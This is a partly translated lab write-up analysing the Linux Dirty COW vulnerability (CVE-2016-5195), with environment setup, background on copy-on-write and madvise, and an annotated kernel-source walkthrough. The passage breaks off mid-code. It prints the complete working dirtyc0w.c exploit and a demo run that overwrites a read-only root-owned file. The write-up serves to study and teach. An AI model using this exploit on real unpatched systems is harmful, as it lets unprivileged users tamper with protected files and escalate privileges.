CVE-2016-5195_dirtycow

Environment Setup

Downloading and Extracting the Kernel Source

sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz
xz -d linux-4.4.tar.xz
tar -xvf linux-4.4.tar
cd linux-4.4

Build

sudo make bzImage -j4

For the filesystem I simply reused a rootfs.cpio from a CTF kernel challenge; the boot script boot.sh also came with the challenge. Unpack the archive inside a newly created core directory, compile the exploit and drop it in, tweak the init file, then repack and mv the new archive back to the main directory:

mkdir core
mv rootfs.cpio core/rootfs.cpio.gz
cd core
gunzip rootfs.cpio.gz
cpio -idmv < rootfs.cpio
cp pathto/dirtyc0w.c .
gcc -pthread -static dirtyc0w.c -o dirtyc0w
vim init
find . | cpio -o --format=newc > rootfs.cpio
mv rootfs.cpio ..

Go back to the CVE's main directory and copy the compiled bzImage from linux-4.4/arch/x86/boot/ into the current directory:

cd ..
cp linux-4.4/arch/x86/boot/bzImage .
vim boot.sh

Quick Reproduction

Start QEMU:

sudo ./boot.sh

// boot.sh
#!/bin/bash
qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' -enable-kvm -monitor /dev/null -m 64M --nographic -smp cores=1,threads=1 -cpu kvm64,+smep

Check the current user and the target file:

/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ uname -a
Linux (none) 4.4.0 #1 SMP Sat Nov 20 21:21:06 CST 2021 x86_64 GNU/Linux
/ $ ls -l foo
-r-----r-- 1 ctf ctf 15 Nov 20 13:40 foo
/ $ cat foo
this_is_a_test

Run dirtyc0w:

/ $ ./dirtyc0w foo 12345678912345
mmap 7f1daeca3000

madvise 0

procselfmem 1400000000

/ $ cat foo
12345678912345

As you can see, the contents of the read-only file foo have been modified.

Background

Copy-On-Write

Suppose there are two processes p1 and p2, where p2 was created by p1 calling fork. At this point p1 and p2 share the same memory; only when one of them modifies that memory is a separate copy made.

This is mainly because:

  1. The child process usually calls an execve()-family function to do its real work. For example, when a process wants to run another program, it first forks a copy of itself, and then one of the copies (usually the child) calls execve to replace itself with the new program. Once the replacement succeeds, execution continues in the new program, much like hijacking malloc_hook to execve in glibc pwn.
  2. fork actually creates a duplicate of the parent with a different pid. If the parent's entire data were copied into the child's new address space at fork time, the copy would be thrown away as soon as an execve-family call replaced the current address space; the copying would be wasted work, so an efficiency optimization is needed.
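
To see copy-on-write from user space, here is a minimal sketch (my own illustration, not part of the exploit): after fork, parent and child logically share the page holding value; the child's store triggers COW, so the parent's copy stays untouched.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int value = 42; /* sits on a page shared by parent and child after fork */

    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        return 1;
    }
    if (pid == 0) {      /* child: this store triggers COW */
        value = 1337;
        printf("child:  value = %d\n", value); /* 1337 */
        exit(0);
    }
    waitpid(pid, NULL, 0);
    printf("parent: value = %d\n", value);     /* still 42 */
    return 0;
}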

madvise

int madvise(void *addr, size_t length, int advice);

This function tells the kernel that the user virtual memory in the range starting at addr and running for length bytes is expected to follow a particular usage pattern.

advice can take, among others, the following values (note that the MADV_ACCESS_* flags below are Solaris-specific; the one that matters here is MADV_DONTNEED):

MADV_ACCESS_DEFAULT
Resets the kernel's expected access pattern for the specified range to the default.

MADV_ACCESS_LWP
Tells the kernel that the next LWP to touch the specified address range will access it the most; the kernel allocates memory and other resources for this range and LWP accordingly.

MADV_ACCESS_MANY
Advises the kernel that many processes or LWPs will access the specified address range randomly across the system; the kernel allocates memory and other resources accordingly.

MADV_DONTNEED
Tells the kernel that the memory from addr to addr+len will not be needed in the near future; the kernel may free it to save space, and the corresponding page-table entries are cleared.
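
A small sketch of MADV_DONTNEED's effect (my own example): after the call, the next access to an anonymous private page faults in a fresh zero-filled page, so the old contents are gone. For a private file mapping, the next access instead reloads the original file contents, which is exactly the behavior the exploit races against.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

int main(void)
{
    char *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    strcpy(p, "hello");
    printf("before madvise: \"%s\"\n", p);   /* hello */

    /* tell the kernel this range is no longer needed */
    if (madvise(p, 4096, MADV_DONTNEED) != 0)
        perror("madvise");

    /* the next access faults in a fresh zero page */
    printf("after madvise:  \"%s\"\n", p);   /* empty string */
    return 0;
}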

POC

/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}

void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}


int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
if (argc<3) {
(void)fprintf(stderr, "%s\n",
"usage: dirtyc0w target_file new_content");
return 1; }
pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping. Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file. It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
pthread_join(pth1,NULL);
pthread_join(pth2,NULL);
return 0;
}

Reproduction Walkthrough

Creating the Read-only File and Saving Its State

First create a read-only file foo:

sudo -s
echo this_is_a_test > foo
chmod 0404 foo
ls -ahl | grep foo
-r-----r-- 1 root root 15 Nov 20 21:40 foo

The file is opened read-only, its metadata is stored into the stat structure st, and the variable name records the file name:

f=open(argv[1],O_RDONLY);
fstat(f,&st);
name=argv[1];

mmap: a Private COW Mapping into User Space

Next, mmap maps the file's contents into user space as a private copy-on-write mapping.

// void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("mmap %zx\n\n",(uintptr_t) map);
  • addr: the mapping address; NULL lets the kernel pick a suitable one.
  • length: the size of the region to map in the process address space; here the file size st_size.
  • prot: the read/write protection of the region; here read-only.
  • flags: the mapping attributes; MAP_PRIVATE creates a private copy-on-write mapping. (Several processes can access the same file through private mappings, and their modifications are not written back to the file on disk.)
  • fd: marks this as a file mapping.
  • offset: the offset into the mapped file.

mmap returns the address of the mapping, map.
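
The private-COW semantics can be checked with a short sketch (my own example; it assumes a pre-existing, non-empty file ./testfile): a write through a MAP_PRIVATE mapping modifies only the process-local copy, never the file itself.

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    int fd = open("testfile", O_RDONLY);  /* assumed to exist, non-empty */
    struct stat st;
    if (fd < 0 || fstat(fd, &st) < 0) {
        perror("open/fstat");
        return 1;
    }

    /* PROT_WRITE is allowed on a read-only fd because the mapping is private */
    char *map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    map[0] = 'X';                 /* COW: only our private copy changes */

    char orig;
    if (pread(fd, &orig, 1, 0) != 1) {  /* re-read the first byte from the file */
        perror("pread");
        return 1;
    }
    printf("mapping: %c, file: %c\n", map[0], orig); /* they differ */
    return 0;
}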

Starting the Threads

Two threads are started: madviseThread and procselfmemThread.

pthread_create(&pth1,NULL,madviseThread,argv[1]);
pthread_create(&pth2,NULL,procselfmemThread,argv[2]);

madviseThread

madviseThread loops 100000000 times, repeatedly telling the kernel that the memory from map to map+100 is no longer needed and may be reclaimed:

void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<100000000;i++)
{
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
c+=madvise(map,100,MADV_DONTNEED);
}
printf("madvise %d\n\n",c);
}

procselfmemThread

As for procselfmemThread:

void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
> The in the wild exploit we are aware of doesn't work on Red Hat
> Enterprise Linux 5 and 6 out of the box because on one side of
> the race it writes to /proc/self/mem, but /proc/self/mem is not
> writable on Red Hat Enterprise Linux 5 and 6.
*/
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
lseek(f,(uintptr_t) map,SEEK_SET);
c+=write(f,str,strlen(str));
}
printf("procselfmem %d\n\n", c);
}

It first opens /proc/self/mem read-write, then loops 100000000 times over lseek and write.

/proc/self/mem is the process's own memory: modifying this file is equivalent to modifying the current process's memory. However, regions that are not properly mapped cannot be read; a read succeeds only at offsets that fall inside mapped regions, e.g.:

$ sudo cat /proc/6412/mem
cat: /proc/6412/mem: Input/output error

That is why lseek is used to position the write offset:

off_t lseek(int fd, off_t offset, int whence);

The offset argument is map, which moves the file position to the address mmap returned (i.e. where the file is mapped); recall that the mapping was created with read permission only.

The whence argument is SEEK_SET, which makes offset, i.e. the mapping address map, the new read/write position.

Then 100000000 write operations attempt to write into that memory.

c+=write(f,str,strlen(str));
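
To isolate the /proc/self/mem mechanics from the race, here is a standalone sketch (my own example): it seeks to the address of an ordinary writable buffer in its own address space and writes through the proc file, the same lseek+write pattern the POC aims at the read-only mapping.

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    char buf[32] = "original";

    int f = open("/proc/self/mem", O_RDWR);
    if (f < 0) {
        perror("open");
        return 1;
    }

    /* position the file offset at buf's address in our own address space */
    lseek(f, (uintptr_t)buf, SEEK_SET);
    if (write(f, "patched", sizeof("patched")) < 0) /* includes the NUL */
        perror("write");

    printf("%s\n", buf); /* prints "patched" */
    close(f);
    return 0;
}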

The two threads race each other:

一个设置了mapmap+offset的内存空间为不再可用待清除的状态,一个不断地调用写操作,希望往map里写入内容;

The Race

The write Path

A call to write(f,str,strlen(str)) goes through the following chain:

write ->
sys_write (SYSCALL_DEFINE3) ->
vfs_write ->
__vfs_write ->
mem_write ->
mem_rw ->
__get_free_pages
(syscall layer => VFS layer => /proc mem handler)

sys_writeSYSCALL_DEFINE3的定义位于include/linux/syscalls.h中;

#define SYSCALL_DEFINE3(name, ...) SYSCALL_DEFINEx(3, _##name, __VA_ARGS__)

asmlinkage long sys_write(unsigned int fd, const char __user *buf, size_t count);

SYSCALL_DEFINE3vfs_write的描述在fd/read_write.c中;

SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
size_t, count)
{
struct fd f = fdget_pos(fd); // look up the file
ssize_t ret = -EBADF; // default return: bad file descriptor
if (f.file) {
loff_t pos = file_pos_read(f.file); // read the current file position
ret = vfs_write(f.file, buf, count, &pos); // hand off to vfs_write
if (ret >= 0)
file_pos_write(f.file, pos);
fdput_pos(f);
}
return ret;
}

ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;
// check that the file was opened writable
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE))
return -EINVAL;
if (unlikely(!access_ok(VERIFY_READ, buf, count)))
return -EFAULT;
ret = rw_verify_area(WRITE, file, pos, count); // validate the range with rw_verify_area()
if (ret >= 0) {
count = ret;
file_start_write(file); // mark the start of the write
ret = __vfs_write(file, buf, count, pos); // dispatch to __vfs_write()
if (ret > 0) {
fsnotify_modify(file);
add_wchar(current, ret);
}
inc_syscw(current);
file_end_write(file); // mark the end of the write
}
return ret;
}

int rw_verify_area(int read_write, struct file *file, const loff_t *ppos, size_t count)
{
struct inode *inode;
loff_t pos;
int retval = -EINVAL;

inode = file_inode(file);
if (unlikely((ssize_t) count < 0))
return retval;
pos = *ppos;
if (unlikely(pos < 0)) {
if (!unsigned_offsets(file))
return retval;
if (count >= -pos) /* both values are in 0..LLONG_MAX */
return -EOVERFLOW;
} else if (unlikely((loff_t) (pos + count) < 0)) {
if (!unsigned_offsets(file))
return retval;
}

if (unlikely(inode->i_flctx && mandatory_lock(inode))) {
retval = locks_mandatory_area(
read_write == READ ? FLOCK_VERIFY_READ : FLOCK_VERIFY_WRITE,
inode, file, pos, count);
if (retval < 0)
return retval;
}
retval = security_file_permission(file,
read_write == READ ? MAY_READ : MAY_WRITE);
if (retval)
return retval;
return count > MAX_RW_COUNT ? MAX_RW_COUNT : count;
}

__vfs_write also lives in fs/read_write.c:

ssize_t __vfs_write(struct file *file, const char __user *p, size_t count,
loff_t *pos)
{
if (file->f_op->write)
return file->f_op->write(file, p, count, pos);
else if (file->f_op->write_iter)
return new_sync_write(file, p, count, pos);
else
return -EINVAL;
}

fs/proc/base.c中,有mem_write及其调用mem_rw,由mem_rw调用__get_free_pages

static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};

static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

mem_rw

mem_rw is the function that deserves close analysis:

static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write) //write=1
{
struct mm_struct *mm = file->private_data;
unsigned long addr = *ppos;
ssize_t copied;
char *page;

if (!mm) // no target mm_struct: nothing to do, return 0
return 0;

page = (char *)__get_free_page(GFP_TEMPORARY); // grab a free bounce page; returns a pointer to the new, zeroed page
if (!page) // allocation failed: return -ENOMEM
return -ENOMEM;

copied = 0;
if (!atomic_inc_not_zero(&mm->mm_users)) // atomic_inc_not_zero(v) increments *v and returns true iff *v was non-zero; i.e. take a reference on mm->mm_users unless the mm is already dead
goto free; // mm already dead: free the page and bail out

while (count > 0) { // loop while bytes remain to transfer

int this_len = min_t(int, count, PAGE_SIZE); // copy at most one page per round: min(count, PAGE_SIZE)

if (write && copy_from_user(page, buf, this_len)) { // on write: copy this_len bytes from the user buffer into the bounce page
copied = -EFAULT;
break;
}

this_len = access_remote_vm(mm, addr, page, this_len, write); // write=1; this_len becomes the number of bytes actually transferred

if (!this_len) {
if (!copied)
copied = -EIO; // transfer failed: report -EIO
break;
}

if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}

buf += this_len;
addr += this_len;
copied += this_len;
count -= this_len;
}
*ppos = addr;

mmput(mm);

free:
free_page((unsigned long) page); // free the bounce page
return copied;
}
mm_struct

First, the mm_struct describing the target address space is obtained; its definition:

struct mm_struct {

// head of the list of VMA objects
struct vm_area_struct * mmap; /* list of VMAs */
// red-black tree of VMA objects
struct rb_root mm_rb;
// the most recently found VMA
struct vm_area_struct * mmap_cache; /* last find_vma result */

// helper used to find a free region in the process address space
unsigned long (*get_unmapped_area) (struct file *filp,
unsigned long addr, unsigned long len,
unsigned long pgoff, unsigned long flags);

unsigned long (*get_unmapped_exec_area) (struct file *filp,
unsigned long addr, unsigned long len,
unsigned long pgoff, unsigned long flags);

// method called when a VMA is released
void (*unmap_area) (struct mm_struct *mm, unsigned long addr);

// base linear address of the first file-mapping allocation
unsigned long mmap_base; /* base of mmap area */


unsigned long task_size; /* size of task vm space */
/*
* RHEL6 special for bug 790921: this same variable can mean
* two different things. If sysctl_unmap_area_factor is zero,
* this means the largest hole below free_area_cache. If the
* sysctl is set to a positive value, this variable is used
* to count how much memory has been munmapped from this process
* since the last time free_area_cache was reset back to mmap_base.
* This is ugly, but necessary to preserve kABI.
*/
unsigned long cached_hole_size;

// cache used when searching for a free linear address range
unsigned long free_area_cache; /* first hole of size cached_hole_size or larger */

// pointer to the page global directory
pgd_t * pgd;

// number of users sharing this address space
atomic_t mm_users; /* How many users with user space? */

// primary reference count of the memory descriptor; when it reaches 0 nobody references it anymore
atomic_t mm_count; /* How many references to "struct mm_struct" (users count as 1) */

// number of VMAs
int map_count; /* number of VMAs */

struct rw_semaphore mmap_sem;

// lock protecting the task's page tables and reference counts
spinlock_t page_table_lock; /* Protects page tables and some counters */

// list of mm_structs; the first element is the initial mm_struct (init_mm)
struct list_head mmlist; /* List of maybe swapped mm's. These are globally strung
* together off init_mm.mmlist, and are protected
* by mmlist_lock
*/

/* Special counters, in some configurations protected by the
* page_table_lock, in other configurations by being atomic.
*/

mm_counter_t _file_rss;
mm_counter_t _anon_rss;
mm_counter_t _swap_usage;

// high-water mark of resident set (RSS) usage
unsigned long hiwater_rss; /* High-watermark of RSS usage */
// high-water mark of virtual memory usage
unsigned long hiwater_vm; /* High-water virtual memory usage */

// size of the address space, pages locked (unswappable), pages of shared file mappings, pages of executable mappings
unsigned long total_vm, locked_vm, shared_vm, exec_vm;
// pages of the user-mode stack, etc.
unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;
// code and data segment boundaries
unsigned long start_code, end_code, start_data, end_data;
// heap and stack boundaries
unsigned long start_brk, brk, start_stack;
// command-line arguments (start and end addresses) and environment variables (start and end addresses)
unsigned long arg_start, arg_end, env_start, env_end;

unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */

struct linux_binfmt *binfmt;

cpumask_t cpu_vm_mask;

/* Architecture-specific MM context */
mm_context_t context;

/* Swap token stuff */
/*
* Last value of global fault stamp as seen by this process.
* In other words, this value gives an indication of how long
* it has been since this task got the token.
* Look at mm/thrash.c
*/
unsigned int faultstamp;
unsigned int token_priority;
unsigned int last_interval;

// default access flags of the VMAs
unsigned long flags; /* Must use atomic bitops to access the bits */

struct core_state *core_state; /* coredumping support */
#ifdef CONFIG_AIO
spinlock_t ioctx_lock;
struct hlist_head ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER
/*
* "owner" points to a task that is regarded as the canonical
* user/owner of this mm. All of the following must be true in
* order for it to be changed:
*
* current == mm->owner
* current->mm != mm
* new_owner->mm == mm
* new_owner->alloc_lock is held
*/
struct task_struct *owner;
#endif

#ifdef CONFIG_PROC_FS
/* store ref to file /proc/<pid>/exe symlink points to */
struct file *exe_file;
unsigned long num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER
struct mmu_notifier_mm *mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE
pgtable_t pmd_huge_pte; /* protected by page_table_lock */
#endif
/* reserved for Red Hat */
#ifdef __GENKSYMS__
unsigned long rh_reserved[2];
#else
/* How many tasks sharing this mm are OOM_DISABLE */
union {
unsigned long rh_reserved_aux;
atomic_t oom_disable_count;
};

/* base of lib map area (ASCII armour) */
unsigned long shlib_base;
#endif
};

mm_structtask_struct的关系如下:

mm_struct

如果加上vma struct,有:

其中重要的几个:

  • mm_users: the number of threads currently referencing this address space; a thread-level counter.

    atomic_t mm_users;			/* How many users with user space? */
  • mm_count: the number of references to this mm_struct held by kernel threads (all user-space users together count as 1).

    atomic_t mm_count;			/* How many references to "struct mm_struct" (users count as 1) */
  • Only when mm_users and mm_count have both dropped to 0 is the mm_struct freed, meaning no user-level process is using the address space and no kernel-level thread references it anymore.
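
The atomic_inc_not_zero pattern that mem_rw applies to mm_users can be sketched in user space with C11 atomics (a simplified analogue, not the kernel implementation): the increment succeeds only if the counter has not already dropped to zero, so a dying mm cannot be revived.

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

/* userspace analogue of the kernel's atomic_inc_not_zero():
 * atomically increment *v unless it is zero; true on success */
static bool inc_not_zero(atomic_int *v)
{
    int old = atomic_load(v);
    do {
        if (old == 0)
            return false;  /* already at zero: do not revive */
    } while (!atomic_compare_exchange_weak(v, &old, old + 1));
    return true;
}

int main(void)
{
    atomic_int mm_users = 1;

    if (inc_not_zero(&mm_users))   /* take a reference, as mem_rw does */
        printf("got reference, mm_users = %d\n", atomic_load(&mm_users));

    atomic_store(&mm_users, 0);    /* simulate the last user exiting */
    if (!inc_not_zero(&mm_users))
        printf("mm already dead, reference refused\n");
    return 0;
}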

__get_free_pages

Next a fresh page is requested; __get_free_page returns a pointer to the new page and zeroes it.

access_remote_vm

mem_rw30行,将会调用access_remote_vm函数;

this_len = access_remote_vm(mm, addr, page, this_len, write);      //write=1

This function lives in mm/memory.c:

/**
* access_remote_vm - access another process' address space
* @mm: the mm_struct of the target address space
* @addr: start address to access
* @buf: source or destination buffer
* @len: number of bytes to transfer
* @write: whether the access is a write
*
* The caller must hold a reference on @mm.
*
* Return: number of bytes copied from source to destination.
*/
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, int write)
{
return __access_remote_vm(NULL, mm, addr, buf, len, write);
}
__access_remote_vm

It calls __access_remote_vm, which returns the number of bytes that were ultimately copied:

static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, int write)
{
struct vm_area_struct *vma;
void *old_buf = buf;

down_read(&mm->mmap_sem);
/* ignore errors, just check how much was successfully transferred */
while (len) {
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;

ret = get_user_pages(tsk, mm, addr, 1, // call get_user_pages; after the patch this becomes get_user_pages_remote
write, 1, &page, &vma);
if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
break;
#else
/*
* Check if this is a VM_IO | VM_PFNMAP VMA, which
* we can access using slightly different code.
*/
vma = find_vma(mm, addr);
if (!vma || vma->vm_start > addr)
break;
if (vma->vm_ops && vma->vm_ops->access)
ret = vma->vm_ops->access(vma, addr, buf,
len, write);
if (ret <= 0)
break;
bytes = ret;
#endif
} else {
bytes = len;
offset = addr & (PAGE_SIZE-1);
if (bytes > PAGE_SIZE-offset)
bytes = PAGE_SIZE-offset;

maddr = kmap(page);
if (write) {
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);
set_page_dirty_lock(page);
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
kunmap(page);
page_cache_release(page);
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);

return buf - old_buf;
}

Here get_user_pages -> __get_user_pages_locked -> __get_user_pages; this chain runs because the write syscall executes get_user_pages in the kernel to obtain the pages it needs to write to.

__get_user_pages

It lives in mm/gup.c.

Its documentation comment:

/**
* __get_user_pages() - pin user pages in memory
* @tsk: task_struct of target task
* @mm: mm_struct of target mm
* @start: starting user address
* @nr_pages: number of pages from start to pin
* @gup_flags: flags modifying pin behaviour
* @pages: array that receives pointers to the pages pinned.
* Should be at least nr_pages long. Or NULL, if caller
* only intends to ensure the pages are faulted in.
* @vmas: array of pointers to vmas corresponding to each page.
* Or NULL if the caller does not require them.
* @nonblocking: whether waiting for disk IO or mmap_sem contention
*
* Returns number of pages pinned. This may be fewer than the number
* requested. If nr_pages is 0 or negative, returns 0. If no pages
* were pinned, returns -errno. Each page returned must be released
* with a put_page() call when it is finished with. vmas will only
* remain valid while mmap_sem is held.
*
* Must be called with mmap_sem held. It may be released. See below.
*
* __get_user_pages walks a process's page tables and takes a reference to
* each struct page that each user address corresponds to at a given
* instant. That is, it takes the page that would be accessed if a user
* thread accesses the given user virtual address at that instant.
*
* This does not guarantee that the page exists in the user mappings when
* __get_user_pages returns, and there may even be a completely different
* page there in some cases (eg. if mmapped pagecache has been invalidated
* and subsequently re faulted). However it does guarantee that the page
* won't be freed completely. And mostly callers simply care that the page
* contains data that was valid *at some point in time*. Typically, an IO
* or similar operation cannot guarantee anything stronger anyway because
* locks can't be held over the syscall boundary.
*
* If @gup_flags & FOLL_WRITE == 0, the page must not be written to. If
* the page is written to, set_page_dirty (or set_page_dirty_lock, as
* appropriate) must be called after the page is finished with, and
* before put_page is called.
*
* If @nonblocking != NULL, __get_user_pages will not wait for disk IO
* or mmap_sem contention, and if waiting is needed to pin all pages,
* *@nonblocking will be set to 0. Further, if @gup_flags does not
* include FOLL_NOWAIT, the mmap_sem will be released via up_read() in
* this case.
*
* A caller using such a combination of @nonblocking and @gup_flags
* must therefore hold the mmap_sem for reading only, and recognize
* when it's been released. Otherwise, it must be held for either
* reading or writing and will not be released.
*
* In most cases, get_user_pages or get_user_pages_fast should be used
* instead of __get_user_pages. __get_user_pages should be used only if
* you need some special @gup_flags.
*/

And its source:

/*
* __get_user_pages() - pin user pages in memory
* @tsk: task_struct of target task
* @mm: mm_struct of target mm
* @start: starting user address
* @nr_pages: number of pages from start to pin
* @gup_flags: flags modifying pin behaviour
* @pages: array that receives pointers to the pages pinned.
* Should be at least nr_pages long. Or NULL, if caller
* only intends to ensure the pages are faulted in.
* @vmas: array of pointers to vmas corresponding to each page.
* Or NULL if the caller does not require them.
* @nonblocking: whether waiting for disk IO or mmap_sem contention
*
*/
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *nonblocking)
{
long i = 0;
unsigned int page_mask;
struct vm_area_struct *vma = NULL;

if (!nr_pages) // no pages requested: return 0
return 0;

VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

/*
* If FOLL_FORCE is set then do not force a full fault as the hinting
* fault information is unrelated to the reference behaviour of a task
* using the address space
*/
if (!(gup_flags & FOLL_FORCE)) // unless FOLL_FORCE is set,
gup_flags |= FOLL_NUMA; // honor NUMA hinting faults

do {
struct page *page;
unsigned int foll_flags = gup_flags; // access-semantics flags
unsigned int page_increm;

/* first iteration or cross vma bound */
if (!vma || start >= vma->vm_end) { // first iteration, or start has crossed past the current vma's end
vma = find_extend_vma(mm, start); // find (possibly extending) the vma containing start
if (!vma && in_gate_area(mm, start)) { // still no vma, but start falls inside the gate area
int ret;
ret = get_gate_page(mm, start & PAGE_MASK, // fetch the gate page for start
gup_flags, &vma,
pages ? &pages[i] : NULL);
if (ret) // on error, return the pages pinned so far or the error code
return i ? : ret;
page_mask = 0;
goto next_page;
}

if (!vma || check_vma_flags(vma, gup_flags)) // no vma, or the flags are incompatible with this vma
return i ? : -EFAULT;
if (is_vm_hugetlb_page(vma)) { // hugetlb vma: take the hugetlb path
i = follow_hugetlb_page(mm, vma, pages, vmas,
&start, &nr_pages, i,
gup_flags); // pin the huge pages
continue;
}
}
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();
/**
* follow_page_mask - look up a page descriptor from a user-virtual address
* @vma: vm_area_struct mapping @address
* @address: virtual address to look up
* @flags: flags modifying lookup behaviour
* @page_mask: on output, *page_mask is set according to the size of the page
*
* @flags can have FOLL_ flags set, defined in <linux/mm.h>
*
* Returns the mapped (struct page *), %NULL if no mapping exists, or
* an error pointer if there is a mapping to something not represented
* by a page descriptor (see also vm_normal_page()).
*/
page = follow_page_mask(vma, start, foll_flags, &page_mask);
// returns the physical page mapped at start, subject to the mapping address and the page attributes in foll_flags
if (!page) { // NULL can mean two things:
// (a) no physical page is present in the page table, i.e. a missing page, or
// (b) the access flags foll_flags demand permissions the page does not grant.
// In the exploit, the first miss is due to (a);
// the second is due to (b): the PTE's page has no write permission, so NULL is returned
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking); // let faultin_page handle the page fault
switch (ret) {
case 0:
goto retry;
case -EFAULT:
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT:
goto next_page;
}
BUG(); // unexpected state: report a bug
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
if (pages) {
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
next_page:
if (vmas) {
vmas[i] = vma;
page_mask = 0;
}
page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
